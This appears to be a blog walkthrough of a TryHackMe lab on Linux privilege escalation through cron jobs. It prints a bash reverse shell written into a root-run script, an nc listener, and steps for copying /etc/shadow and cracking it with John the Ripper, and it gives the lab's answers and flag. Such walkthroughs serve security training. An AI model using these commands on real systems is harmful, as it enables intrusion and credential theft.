This article discusses the solution for TryHackMe's Linux Privilege Escalation Cron Jobs task so proceed with caution.
I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.
Privilege Escalation Cron Jobs Solution
Notes:
- Check /etc/crontab for script files that run as root but that the current user can write to. Such a script can be changed to launch a reverse shell.
- Check /etc/crontab for script files that have already been deleted but whose entries were not removed from the crontab. A file with the same name can be created in its place.
- Check the PATH set in the crontab. If /home/{user} is included, a script can be created in the current user's home folder. Also check whether the user has write permission on any other PATH directory.
- tar, 7z, rsync etc. can be exploited using their wildcard feature.
How many user-defined cron jobs can you see on the target system?
- Run cat /etc/crontab
Answer: 4
What is the content of the flag5.txt file?
We can see in the crontab that there is a file /home/karen/backup.sh. Run
cat /home/karen/backup.sh
to check its contents. We also discover that we have write access to the file.
Modify this file so that it launches a reverse shell.
Let's launch a listener at port 9999 in our Kali machine.
nc -lvnp 1234
Let's locate our server IP by running
ifconfig
in our Kali machine and take the inet address of tun0.
Run
vim /home/karen/backup.sh
and modify the code to the following to create a reverse shell.
#!/bin/bash
bash -i >& /dev/tcp/{tun0 inet ip}/1234 0>&1
Run
chmod +x backup.sh
Wait on the listener terminal until the reverse shell is activated.
- Run cat /home/ubuntu/flag5.txt
Answer: THM-383000283
What is Matt's password?
- Create local files passwd.txt and shadow.txt and copy into them the content of the target machine's /etc/passwd and /etc/shadow.
Unshadow the files:
unshadow passwd.txt shadow.txt > passwords.txt
Run John the Ripper on passwords.txt:
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Answer: 123456
Until next time. Keep learning.
Stay stoked and code. :)
I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)
Thank you very much. :)